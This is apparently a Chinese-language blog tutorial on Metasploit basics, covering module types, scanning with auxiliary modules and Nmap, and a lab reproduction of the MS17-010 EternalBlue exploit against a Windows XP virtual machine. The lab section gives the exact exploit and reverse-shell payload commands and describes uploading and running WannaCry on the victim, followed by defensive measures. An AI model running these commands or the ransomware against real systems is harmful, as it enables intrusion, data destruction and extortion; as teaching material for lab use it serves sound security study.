當您閱讀到該篇文章時，作者已經將“網路安全自學篇”設定成了收費專欄，首先說聲抱歉，感謝這一年來大家的閱讀和陪伴，這100篇安全文章記錄了自己從菜雞到菜鳥的成長史，該部分知識也花了很多精力去學習和總結，由于在外讀書且需要養娃，所以按最低價9.9元設定成了收費專欄，賺點奶粉錢，感謝您的抬愛，當然，如果您還是一名在讀學生或經濟拮據，可以私聊我給你每篇文章開白名單，也可以去github下載對應的免費文章，更希望您能進步，一起加油喔！

接下來我會接著之前的內容繼續分享，“網路安全提高班”新的100篇文章即將開啟，包括Web滲透、內網滲透、靶場搭建、CVE復現、攻擊溯源、實戰及CTF總結，它將更加聚焦，更加深入，也是作者的慢慢成長史，換專業確實挺難的，Web滲透也是塊硬骨頭，但我也試試，看看自己未來四年究竟能將它學到什么程度，漫漫長征路，偏向虎山行，享受程序，一起加油~

本文是“網路安全提高篇”第二篇文章，將帶領大家了解Metasploit技術，并結合作者之前的漏洞利用及WannaCry逆向經驗總結，同時本文學習了徐焱老師他們的《Web安全攻防滲透測驗實戰指南》，在此感謝，具體內容包括：

• 一.Metasploit簡介
• 二.Metasploit基礎普及
  1.專業術語
  2.滲透步驟及攻擊鏈
• 三.主機掃描
  1.使用輔助模塊進行埠掃描
  2.使用輔助模塊進行服務掃描
  3.使用Nmap掃描
• 四.漏洞利用之MS17-010案例
  1.背景知識
  2.漏洞利用復現
  3.防御措施

作者作為網路安全的小白，分享一些自學基礎教程給大家，主要是關于安全工具和實踐操作的在線筆記，希望您們喜歡，同時，更希望您能與我一起操作和進步，后續將深入學習網路安全和系統安全知識并分享相關實驗，總之，希望該系列文章對博友有所幫助，寫文不易，大神們不喜勿噴，謝謝！如果文章對您有幫助，將是我創作的最大動力，點贊、評論、私聊均可，一起加油喔~

• 自學篇文章：https://github.com/eastmountyxz/CSDNBlog-Security-Based
• 自學篇工具：https://github.com/eastmountyxz/NetworkSecuritySelf-study
• 系統安全：https://github.com/eastmountyxz/SystemSecurity-ReverseAnalysis

宣告：本人堅決反對利用教學方法進行犯罪的行為，一切犯罪行為必將受到嚴懲，綠色網路需要我們共同維護，更推薦大家了解它們背后的原理，更好地進行防護，

提高篇：（自學系列100篇目錄放在文章末尾）
[網路安全提高班] 一〇一.網路空間安全普及和醫療資料安全防護總結
[網路安全提高篇] 一〇二.Metasploit技術之基礎用法萬字詳解及MS17-010漏洞復現

一.Metasploit簡介

Metasploit是一款開源的安全漏洞檢測工具，可以幫助安全和IT專業人士識別安全性問題，驗證漏洞的緩解措施，并管理專家驅動的安全性進行評估，提供真正的安全風險情報，這些功能包括智能開發、代碼審計、Web應用程式掃描、社會工程等，

Metasploit框架（Metasploit Framework，MSF）是一個開源工具，旨在方便滲透測驗，它是由Ruby程式語言撰寫的模板化框架，具有很好的擴展性，便于滲透測驗人員開發、使用定制的工具模板，Metasploit已成為當前資訊安全與滲透測驗領域最流行的術語，

Metasploit可向后端模塊提供多種用來控制測驗的介面，如控制臺、Web、CLI，推薦使用控制臺介面，通過控制臺介面可以訪問和使用所有Metasploit的插件，如Payload、利用模塊、Post模塊等，Metasploit還有第三方程式的介面，比如Nmap、SQLMap等，可以直接在控制臺介面使用，

當H.D. Moore在2003年發布Metasploit時，計算機安全狀況也被永久性地改變了，仿佛一夜之間，任何人都可以成為黑客，每個人都可以使用攻擊工具來攻擊那些未打過補丁或者剛剛打過補丁的漏洞，軟體廠商再也不能推遲發布針對已公布漏洞的補丁，這是因為Metasploit團隊一直都在努力開發各種攻擊工具，并將它們貢獻給所有Metasploit用戶，

• https://www.rapid7.com/products/metasploit/download/

這篇文章主要以Kali系統為基礎，該作業系統預裝了Metasploit，訪問該界面，需要在命令列下輸入 msfconsole，MSF的啟動界面如下圖所示，

msfconsole

在使用Kali作業系統時因注意及時更新資源，就像平時更新收集APP一樣，更新命令主要包括：

• apt-get update
  只更新軟體包的索引源，作用是同步源的軟體包的索引資訊，從而進行軟體更新

• apt-get upgrade
  升級系統上安裝的所有軟體包

• apt-get dist-upgrade
  升級整個Linux系統

二.Metasploit基礎普及

1.專業術語

MSF框架由多個模塊組成，各個模塊的功能如下，這也是Web滲透的基礎術語，

(1) Auxiliaries：輔助模塊
該模塊不會直接在測驗者和目標主機之間建立訪問，它們只負責執行掃描、嗅探、指紋識別等相關功能以輔助滲透測驗，

(2) Exploit：漏洞利用模塊
漏洞利用是指由滲透測驗者利用一個系統、應用或服務中的安全漏洞進行的攻擊行為，流行的滲透攻擊技術包括：

• 緩沖區溢位
• Web應用程式攻擊
• 利用配置錯誤

其中包含攻擊者或滲透人員針對系統中的漏洞而設計的各種POC驗證程式，用于破壞系統安全性的攻擊代碼，每個漏洞都有相應的攻擊代碼，

(3) Payload：攻擊載荷模塊
攻擊載荷是我們期望目標系統在被滲透攻擊之后完成實際攻擊功能的代碼，成功滲透目標后，用于在目標系統上運行任意命令或者執行特定代碼，在Metasploit框架中可以自由地選擇、傳送和植入，攻擊載荷也可能是簡單地目標作業系統上執行一些命令，如添加用戶賬號等，

(4) Post：后期滲透模塊
該模塊主要用于取得目標系統遠程控制權后，進行一系列的后滲透攻擊動作，如獲取敏感資訊、實施跳板攻擊等，

(5) Encoders：編碼工具模塊
該模塊在滲透測驗中負責免殺，以防止被殺毒軟體、防火墻、IDS及類似的安全軟體檢測出來，

2.滲透步驟及攻擊鏈

使用MSF滲透測驗時，可以綜合使用以上模塊，對目標系統進行偵查并發動攻擊，大致的步驟如下所示：

• 掃描目標主機系統，尋找可用漏洞
• 選擇并配置一個漏洞利用模塊
• 選擇并配置一個攻擊載荷模塊
• 選擇一個編碼技術，用來繞過殺毒軟體的查殺
• 滲透攻擊

注意，實戰才是最好的老師，希望大家了解MSF基礎用法后，在一些靶場或授權網站上進行滲透測驗，同時，為了方便大家理解滲透流程，作者回顧下之前介紹的攻擊鏈，攻擊鏈通常分為七個階段：

• 偵查目標(Reconnaissance)：偵查目標，充分利用社會工程學了解目標網路，
• 制作工具(Weaponization)：主要是指制作定向攻擊工具，例如帶有惡意代碼的pdf檔案或office檔案，
• 傳送工具(Delivery)：輸送攻擊工具到目標系統上，常用的手法包括郵件的附件、網站（掛馬）、U盤等，
• 觸發工具(Exploitation)：利用目標系統的應用或作業系統漏洞，在目標系統觸發攻擊工具運行，
• 安裝木馬(Installation)：遠程控制程式（特馬）的安裝，使得攻擊者可以長期潛伏在目標系統中，
• 建立連接(Command and Control)：與互聯網控制器服務器建立一個C2信道，
• 執行攻擊(Actions on Objectives)：執行所需要得攻擊行為，例如偷取資訊、篡改資訊等，

三.主機掃描

掃描和收集資訊是滲透測驗的第一步，其主要目標是盡可能多地發現有關目標機器的資訊，獲取的資訊越多，滲透的概率越大，該步驟主要的關注點是：

• 目標主機IP地址
• 可用服務
• 開放埠

1.使用輔助模塊進行埠掃描

輔助模塊是Metasploit的內置模塊，

第一步，利用search命令搜索有哪些可用埠模塊，

search portscan

從下圖中可以看到可用的掃描器串列，其中包含了各種掃描型別，

第二步，以TCP掃描模塊為例，輸入use命令使用該漏洞利用模塊，然后show options查看需要設定的引數，

use auxiliary/scanner/portscan/tcp
show options

輸入命令時，按下tab鍵會自動補齊，輸出結果如下圖所示，在Required列中，被標記為yes的引數必須包含實際的值，其中：

• RHOSTS - 設定待掃描的IP地址
• PORTS - 設定掃描埠范圍
• THREDAS - 設定掃描執行緒，執行緒數越高，掃描的速度越多

第三步，使用set命令設定相應引數，查看目標主機開放埠，
當然，也可以使用unset命令取消某個引數值的設定，這里的目標主機是XP系統，其IP地址為 192.168.44.135 ，

具體命令如下，可以看到目標主機開了 135、139、445 三個埠，

set RHOSTS 192.168.44.135
set PORTS 1-500
set THREADS 20
show options
run

輸出結果如下圖所示，還有兩個可選命令，setg和unsetg，二者用于在msfconsole中設定或取消設定全域性的引數值，從而避免重復輸入相同的值，

2.使用輔助模塊進行服務掃描

在掃描目標機器上運行的服務時，有多種基于服務的掃描技術可供選擇，例如VNC、FTP、SMB等，只需執行特定型別的掃描就可以發現服務，

通過 search 命令搜索 scanner 可以發現大量的掃描模塊，讀者可以嘗試不同的輔助掃描模塊，了解其功能，使用步驟和使用埠掃描模塊時基本相同，后續文章也會陸續介紹不同的用法，

常用的掃描模塊包括：

(1) 埠掃描

• auxiliary/scanner/portscan
  埠掃描

(2) SMB掃描

• auxiliary/scanner/smb/smb_version
  SMB系統版本掃描
• auxiliary/scanner/smb/smb_enumusers
  SMB列舉
• auxiliary/scanner/smb/smb_login
  SMB弱口令掃描
• auxiliary/scanner/smb/psexec_command
  SMB登錄執行命令

(3) SSH掃描

• auxiliary/scanner/ssh/ssh_login
  SSH登錄測驗

(4) MSSQL掃描

• scanner/mssql/mssql_ping
  MSSQL主機資訊掃描
• admin/mssql/mssql_enum
  MSSQL列舉
• admin/mssql/mssql_exec
  MSSQL執行命令
• admin/mssql/mssql_sql
  MSSQL查詢
• admin/mssql/mssql_login
  MSSQL弱口令掃描

(5) MySQL掃描

• auxiliary/admin/mysql/mssql_enum
  MySQL列舉
• auxiliary/admin/mysql/mssql_sql
  MySQL陳述句執行
• auxiliary/scanner/mysql/mssql_login
  MySQL弱口令掃描

(6) SMTP掃描

• auxiliary/scanner/smtp/smtp_version
  SMTP版本掃描
• auxiliary/scanner/smtp/smtp_enum
  SMTP列舉

(7) 其他

• auxiliary/scanner/snmp/community
  SNMP掃描設備
• auxiliary/scanner/telnet/telnet_login
  Telnet登錄
• scanner/vnc/vnc_none_auth
  VNC空口令掃描

3.使用Nmap掃描

在Metasploit中同樣可以使用Nmap掃描，Nmap不僅可以用來確定目標網路上計算機的存活狀態，而且可以掃描計算機的作業系統、開放埠、服務等，熟練掌握Nmap的用法可以極大地提高個人的滲透測驗技術，

實際上，在msf命令提示符下輸入nmap，就可以顯示Nmap提供的掃描選項串列，如下圖所示：

我們要獲取目標主機的作業系統，則輸入 nmap -O -Pn/-p0 URI 命令，其中Pn和-p0引數是不使用ping的方式，而假定所有主機系統都是活動的，可以穿透防火墻，也可以避免防火墻發現，運行如下圖所示：

nmap -O -Pn 192.168.44.135

輸出結果如下圖所示，可以看到目標主機的作業系統如下，后續作者會詳細寫一篇文章介紹Nmap的用法，

• Windows 2000 | XP

四.漏洞利用之MS17-010案例

每個作業系統都會存在各種漏洞，像微公司會快速針對漏洞進行打補丁，供用戶提供更新，而沒有公布補丁的Bug就是所謂的0day漏洞，其危害極大，也很受黑客和安全人員的喜愛，

實際上，像微軟這樣的公司都會針對自己的產品定期發布補丁，但是否下載取決于用戶自身，由于安全意識薄弱的個人或中小企業往往會忽略這些作業，打補丁可能會影響平時的作業，這種1day漏洞所造成的傷害也非常嚴重，

下面我們對Windows XP系統進行MS17-010漏洞的復現，前面我通過四篇文章逆向WannaCry時，詳細復現過該漏洞，希望大家喜歡，

• [網路安全自學篇] 七十三.WannaCry勒索病毒復現及分析（四）蠕蟲傳播機制全網原始碼詳細解讀

1.背景知識

2017年5月12日，WannaCry蠕蟲通過永恒之藍MS17-010漏洞在全球范圍大爆發，感染大量的計算機，WannaCry勒索病毒全球大爆發，至少150個國家、30萬名用戶中招，造成損失達80億美元，已影響金融、能源、醫療、教育等眾多行業，造成嚴重的危害，

WannaCry是一種“蠕蟲式”勒索病毒軟體，由不法分子利用NSA泄露方程式工具包的危險漏洞“EternalBlue”（永恒之藍）進行傳播，該蠕蟲感染計算機后會向計算機中植入敲詐者病毒，導致電腦大量檔案被加密，

WannaCry利用Windows系統的SMB漏洞獲取系統的最高權限，該工具通過惡意代碼掃描開放445埠的Windows系統，被掃描到的Windows系統，只要開機上線，不需要用戶進行任何操作，即可通過SMB漏洞上傳WannaCry勒索病毒等惡意程式，

WannaCry利用永恒之藍漏洞進行網路埠掃描攻擊，目標機器被成功攻陷后會從攻擊機下載WannaCry蠕蟲進行感染，并作為攻擊機再次掃描互聯網和局域網的其他機器，行成蠕蟲感染大范圍超快速擴散，其核心流程如下圖所示：

WannaCry勒索病毒主要行為是傳播和勒索，

• 傳播：利用基于445埠的SMB漏洞MS17-010(永恒之藍)進行傳播
• 勒索：釋放檔案，包括加密器、解密器、說明檔案、語言檔案等；加密檔案；設定桌面背景、表單資訊及付款賬號等，

2.漏洞利用復現

實驗環境：

• 攻擊機：Kali-linux-2019.2 IP:192.168.44.138
• 受害主機：WinXP 64位 IP:192.168.44.135

實驗工具：

• metasploit
• MS17-010
• Wcry.exe

實驗步驟：

• 配置Windows XP、Kali實驗環境
• Kali檢測受害主機445埠（SMB協議）是否開啟
• 運行EternalBlue永恒之藍漏洞(MS17-010)反彈shell
• 上傳勒索病毒wcry.exe并運行實作勒索和檔案加密（該文章不實作）

切記、切記、切記：實驗復現程序中必須在虛擬機中完成，運行之前關閉虛擬機Win7檔案共享，真機上一旦被感染你就真的只能想哭了（wannacry），同時，該實驗比上一篇文章精簡很多，更推薦該方法，

第一步，保證攻擊機和受害機相互通訊，均在同一個局域網中，

第二步，掃描靶機是否開啟445埠，

• nmap -sS 192.168.44.135

第三步，打開msfconsole并查詢MS17-010漏洞模塊，
這里有各種MS17-010漏洞版本，我們根據目標系統選擇編號為3的版本，推薦讀者看看NSA泄露的方程式工具包，其中永恒之藍（eternalblue）就是著名的漏洞，

• msfconsole
• search ms17-010

第四步，利用永恒之藍漏洞并設定引數，

• use exploit/windows/smb/ms17_010_eternalblue
  利用永恒之藍漏洞
• set payload windows/x64/meterpreter/reverse_tcp
  設定payload
• set LHOST 192.168.44.138
  設定本機IP地址
• set RHOSTS 192.168.44.135
  設定受害主機IP
• set RPORT 445
  設定埠445，注意該埠共享功能是高危漏洞埠，包括之前分享的139、3389等
• exploit
  利用漏洞

通過 show options 可以查看我們設定的引數值，

注意，這里Win7和Win XP系統設定略有區別，如果用Win7的模塊去攻擊XP系統，會造成計算機重啟，攻擊失敗，如下圖所示，

Windows XP設定的exp如下：

• exploit/windows/smb/ms17_010_eternalblue

運行成功結果如下圖所示：

第五步，成功獲取Windows系統管理員權限，

• pwd、ls
  查看當前路徑及目錄
• getuid
  回傳系統管理員權限

第六步，在目標主機上創建檔案，嘗試控制目標，

cd ..
# 創建檔案夾
mkdir hacker
# 訪問目錄
dir
cd hacker
# 創建檔案并寫入內容
echo helloworld>test.txt
# 查看目標系統的基本資訊
sysinfo

第七步，上傳WannaCry，再次強調，虛擬機中運行該實驗，并且關閉檔案共享功能，同時蠕蟲和漏洞利用分析是為了幫助大家了解原理進行防御，

• shell
• upload /root/wcry.exe c:\

運行病毒程式后的界面如下圖所示，已經成功被勒索，再次強調，所有代碼必須在虛擬機中執行，并且關閉檔案共享，

WannaCry蠕蟲加密系統中的檔案，被加密的檔案后綴名統一修改為“.WNCRY”，

• b.wnry: 中招敲詐者后桌面壁紙
• c.wnry: 組態檔，包含洋蔥域名、位元幣地址、tor下載地址等
• f.wnry: 可免支付解密的檔案串列
• r.wnry: 提示檔案，包含中招提示資訊
• s.wnry: zip檔案，包含Tor客戶端
• t.wnry: 測驗檔案
• u.wnry: 解密程式

3.防御措施

至此，我們已經成功利用了MS17-010漏洞實作入侵，其防御常見的措施如下：

• 開啟系統防火墻
• 關閉445、139等埠連接
• 開啟系統自動更新，下載并更新補丁，及時修復漏洞
• 為計算機安全最新補丁，微軟已經發布補丁MS17-010修復該漏洞，讀者也可以通過第三方工具下載補丁
• 安裝安全軟體，開啟主動防御進行攔截查殺
• 如非服務需要，建議把高危漏洞的埠都關閉，比如 135、137、138、139、445、3389 等
• 開啟防火墻，及時備份重要檔案

由于WannaCry等勒索病毒主要通過445埠入侵計算機，關閉的方法如下：

• 控制面板–>windows防火墻—>高級選項–>入站規則
• 新建規則–>選擇埠–>指定埠號445
• 選擇阻止連接–>組態檔全選–>規則名稱–>成功關閉

實驗在虛擬機中進行，也需要關閉共享檔案夾功能，如下圖所示，

五.總結

寫到這里，這篇文章就介紹完畢，希望您喜歡，本文主要是學習徐焱老師他們的《Web安全攻防滲透測驗實戰指南》，同時結合作者之前的漏洞利用及WannaCry逆向經驗總結，

• 一.Metasploit簡介
• 二.Metasploit基礎普及
  1.專業術語
  2.滲透步驟及攻擊鏈
• 三.主機掃描
  1.使用輔助模塊進行埠掃描
  2.使用輔助模塊進行服務掃描
  3.使用Nmap掃描
• 四.漏洞利用之MS17-010案例
  1.背景知識
  2.漏洞利用復現
  3.防御措施

這篇文章中如果存在一些不足，還請海涵，作者作為網路安全初學者的慢慢成長路吧！希望未來能更透徹撰寫相關文章，同時非常感謝參考文獻中的安全大佬們的文章分享，感謝師傅、師兄師弟、師姐師妹們的教導，深知自己很菜，得努力前行，

歡迎大家討論，是否覺得這系列文章幫助到您！任何建議都可以評論告知讀者，共勉，

• 逆向分析：https://github.com/eastmountyxz/SystemSecurity-ReverseAnalysis
• 網路安全：https://github.com/eastmountyxz/NetworkSecuritySelf-study

2020年8月18新開的“娜璋AI安全之家”，主要圍繞Python大資料分析、網路空間安全、人工智能、Web滲透及攻防技術進行講解，同時分享CCF、SCI、南核北核論文的演算法實作，娜璋之家會更加系統，并重構作者的所有文章，從零講解Python和安全，寫了近十年文章，真心想把自己所學所感所做分享出來，還請各位多多指教，真誠邀請您的關注！謝謝，

(By:Eastmount 2021-02-26 夜于武漢 http://blog.csdn.net/eastmount/ )

參考文章如下，感謝這些大佬，

• [1] https://www.rapid7.com/products/metasploit/download/
• [2] 《Web安全攻防滲透測驗實戰指南》徐焱、李文軒、王東亞老師
• [3] https://blog.csdn.net/Eastmount

自學篇（建議直接跳轉到正文）：

[網路安全自學篇] 一.入門筆記之看雪Web安全學習及異或解密示例
[網路安全自學篇] 二.Chrome瀏覽器保留密碼功能滲透決議及登錄加密入門筆記
[網路安全自學篇] 三.Burp Suite工具安裝配置、Proxy基礎用法及暴庫示例
[網路安全自學篇] 四.實驗吧CTF實戰之WEB滲透和隱寫術解密
[網路安全自學篇] 五.IDA Pro反匯編工具初識及逆向工程解密實戰
[網路安全自學篇] 六.OllyDbg動態分析工具基礎用法及Crakeme逆向
[網路安全自學篇] 七.快手視頻下載之Chrome瀏覽器Network分析及Python爬蟲探討
[網路安全自學篇] 八.Web漏洞及埠掃描之Nmap、ThreatScan和DirBuster工具
[網路安全自學篇] 九.社會工程學之基礎概念、IP獲取、IP物理定位、檔案屬性
[網路安全自學篇] 十.論文之基于機器學習演算法的主機惡意代碼
[網路安全自學篇] 十一.虛擬機VMware+Kali安裝入門及Sqlmap基本用法
[網路安全自學篇] 十二.Wireshark安裝入門及抓取網站用戶名密碼（一）
[網路安全自學篇] 十三.Wireshark抓包原理（ARP劫持、MAC泛洪）及資料流追蹤和影像抓取（二）
[網路安全自學篇] 十四.Python攻防之基礎常識、正則運算式、Web編程和套接字通信（一）
[網路安全自學篇] 十五.Python攻防之多執行緒、C段掃描和資料庫編程（二）
[網路安全自學篇] 十六.Python攻防之弱口令、自定義字典生成及網站暴庫防護
[網路安全自學篇] 十七.Python攻防之構建Web目錄掃描器及ip代理池（四）
[網路安全自學篇] 十八.XSS跨站腳本攻擊原理及代碼攻防演示（一）
[網路安全自學篇] 十九.Powershell基礎入門及常見用法（一）
[網路安全自學篇] 二十.Powershell基礎入門及常見用法（二）
[網路安全自學篇] 二十一.GeekPwn極客大賽之安全攻防技術總結及ShowTime
[網路安全自學篇] 二十二.Web滲透之網站資訊、域名資訊、埠資訊、敏感資訊及指紋資訊收集
[網路安全自學篇] 二十三.基于機器學習的惡意請求識別及安全領域中的機器學習
[網路安全自學篇] 二十四.基于機器學習的惡意代碼識別及人工智能中的惡意代碼檢測
[網路安全自學篇] 二十五.Web安全學習路線及木馬、病毒和防御初探
[網路安全自學篇] 二十六.Shodan搜索引擎詳解及Python命令列呼叫
[網路安全自學篇] 二十七.Sqlmap基礎用法、CTF實戰及請求引數設定（一）
[網路安全自學篇] 二十八.檔案上傳漏洞和Caidao入門及防御原理（一）
[網路安全自學篇] 二十九.檔案上傳漏洞和IIS6.0決議漏洞及防御原理（二）
[網路安全自學篇] 三十.檔案上傳漏洞、編輯器漏洞和IIS高版本漏洞及防御（三）
[網路安全自學篇] 三十一.檔案上傳漏洞之Upload-labs靶場及CTF題目01-10（四）
[網路安全自學篇] 三十二.檔案上傳漏洞之Upload-labs靶場及CTF題目11-20（五）
[網路安全自學篇] 三十三.檔案上傳漏洞之繞狗一句話原理和繞過安全狗（六）
[網路安全自學篇] 三十四.Windows系統漏洞之5次Shift漏洞啟動計算機
[網路安全自學篇] 三十五.惡意代碼攻擊溯源及惡意樣本分析
[網路安全自學篇] 三十六.WinRAR漏洞復現（CVE-2018-20250）及惡意軟體自啟動劫持
[網路安全自學篇] 三十七.Web滲透提高班之hack the box在線靶場注冊及入門知識（一）
[網路安全自學篇] 三十八.hack the box滲透之BurpSuite和Hydra密碼爆破及Python加密Post請求（二）
[網路安全自學篇] 三十九.hack the box滲透之DirBuster掃描路徑及Sqlmap高級注入用法（三）
[網路安全自學篇] 四十.phpMyAdmin 4.8.1后臺檔案包含漏洞復現及詳解（CVE-2018-12613）
[網路安全自學篇] 四十一.中間人攻擊和ARP欺騙原理詳解及漏洞還原
[網路安全自學篇] 四十二.DNS欺騙和釣魚網站原理詳解及漏洞還原
[網路安全自學篇] 四十三.木馬原理詳解、遠程服務器IPC$漏洞及木馬植入實驗
[網路安全自學篇] 四十四.Windows遠程桌面服務漏洞（CVE-2019-0708）復現及詳解
[網路安全自學篇] 四十五.病毒詳解及批處理病毒制作（自啟動、修改密碼、定時關機、藍屏、行程關閉）
[網路安全自學篇] 四十六.微軟證書漏洞CVE-2020-0601 (上)Windows驗證機制及可執行檔案簽名復現
[網路安全自學篇] 四十七.微軟證書漏洞CVE-2020-0601 (下)Windows證書簽名及HTTPS網站劫持
[網路安全自學篇] 四十八.Cracer第八期——(1)安全術語、Web滲透流程、Windows基礎、注冊表及黑客常用DOS命令
[網路安全自學篇] 四十九.Procmon軟體基本用法及檔案行程、注冊表查看
[網路安全自學篇] 五十.虛擬機基礎之安裝XP系統、檔案共享、網路快照設定及Wireshark抓取BBS密碼
[網路安全自學篇] 五十一.惡意樣本分析及HGZ木馬控制目標服務器
[網路安全自學篇] 五十二.Windows漏洞利用之堆疊溢位原理和堆疊保護GS機制
[網路安全自學篇] 五十三.Windows漏洞利用之Metasploit實作堆疊溢位攻擊及反彈shell
[網路安全自學篇] 五十四.Windows漏洞利用之基于SEH例外處理機制的堆疊溢位攻擊及shell提取
[網路安全自學篇] 五十五.Windows漏洞利用之構建ROP鏈繞過DEP并獲取Shell
[網路安全自學篇] 五十六.i春秋老師分享小白滲透之路及Web滲透技術總結
[網路安全自學篇] 五十七.PE檔案逆向之什么是數字簽名及Signtool簽名工具詳解（一）
[網路安全自學篇] 五十八.Windows漏洞利用之再看CVE-2019-0708及Metasploit反彈shell
[網路安全自學篇] 五十九.Windows漏洞利用之MS08-067遠程代碼執行漏洞復現及shell深度提權
[網路安全自學篇] 六十.Cracer第八期——(2)五萬字總結Linux基礎知識和常用滲透命令
[網路安全自學篇] 六十一.PE檔案逆向之數字簽名詳細決議及Signcode、PEView、010Editor、Asn1View等工具用法（二）
[網路安全自學篇] 六十二.PE檔案逆向之PE檔案決議、PE編輯工具使用和PE結構修改（三）
[網路安全自學篇] 六十三.hack the box滲透之OpenAdmin題目及蟻劍管理員提權（四）
[網路安全自學篇] 六十四.Windows漏洞利用之SMBv3服務遠程代碼執行漏洞（CVE-2020-0796）復現及詳解
[網路安全自學篇] 六十五.Vulnhub靶機滲透之環境搭建及JIS-CTF入門和蟻劍提權示例（一）
[網路安全自學篇] 六十六.Vulnhub靶機滲透之DC-1提權和Drupal漏洞利用（二）
[網路安全自學篇] 六十七.WannaCry勒索病毒復現及分析（一）Python利用永恒之藍及Win7勒索加密
[網路安全自學篇] 六十八.WannaCry勒索病毒復現及分析（二）MS17-010利用及病毒決議
[網路安全自學篇] 六十九.宏病毒之入門基礎、防御措施、自發郵件及APT28樣本分析
[網路安全自學篇] 七十.WannaCry勒索病毒復現及分析（三）蠕蟲傳播機制分析及IDA和OD逆向
[網路安全自學篇] 七十一.深信服分享之外部威脅防護和勒索病毒對抗
[網路安全自學篇] 七十二.逆向分析之OllyDbg動態除錯工具（一）基礎入門及TraceMe案例分析
[網路安全自學篇] 七十三.WannaCry勒索病毒復現及分析（四）蠕蟲傳播機制全網原始碼詳細解讀
[網路安全自學篇] 七十四.APT攻擊檢測溯源與常見APT組織的攻擊案例
[網路安全自學篇] 七十五.Vulnhub靶機滲透之bulldog資訊收集和nc反彈shell（三）
[網路安全自學篇] 七十六.逆向分析之OllyDbg動態除錯工具（二）INT3斷點、反除錯、硬體斷點與記憶體斷點
[網路安全自學篇] 七十七.惡意代碼與APT攻擊中的武器（強推Seak老師）
[網路安全自學篇] 七十八.XSS跨站腳本攻擊案例分享及總結（二）
[網路安全自學篇] 七十九.Windows PE病毒原理、分類及感染方式詳解
[網路安全自學篇] 八十.WHUCTF之WEB類解題思路WP（代碼審計、檔案包含、過濾繞過、SQL注入）
[網路安全自學篇] 八十一.WHUCTF之WEB類解題思路WP（檔案上傳漏洞、冰蝎蟻劍、反序列化phar）
[網路安全自學篇] 八十二.WHUCTF之隱寫和逆向類解題思路WP（文字解密、圖片解密、佛語解碼、冰蝎流量分析、逆向分析）
[網路安全自學篇] 八十三.WHUCTF之CSS注入、越權、csrf-token竊取及XSS總結
[網路安全自學篇] 八十四.《Windows黑客編程技術詳解》之VS環境配置、基礎知識及DLL延遲加載詳解
[網路安全自學篇] 八十五.《Windows黑客編程技術詳解》之注入技術詳解（全域鉤子、遠執行緒鉤子、突破Session 0注入、APC注入）
[網路安全自學篇] 八十六.威脅情報分析之Python抓取FreeBuf網站APT文章（上）
[網路安全自學篇] 八十七.惡意代碼檢測技術詳解及總結
[網路安全自學篇] 八十八.基于機器學習的惡意代碼檢測技術詳解
[網路安全自學篇] 八十九.PE檔案決議之通過Python獲取時間戳判斷軟體來源地區
[網路安全自學篇] 九十.遠控木馬詳解及APT攻擊中的遠控
[網路安全自學篇] 九十一.阿里云搭建LNMP環境及實作PHP自定義網站IP訪問 (1)
[網路安全自學篇] 九十二.《Windows黑客編程技術詳解》之病毒啟動技術創建行程API、突破SESSION0隔離、記憶體加載詳解（3）
[網路安全自學篇] 九十三.《Windows黑客編程技術詳解》之木馬開機自啟動技術（注冊表、計劃任務、系統服務）
[網路安全自學篇] 九十四.《Windows黑客編程技術詳解》之提權技術（令牌權限提升和Bypass UAC）
[網路安全自學篇] 九十五.利用XAMPP任意命令執行漏洞提升權限（CVE-2020-11107）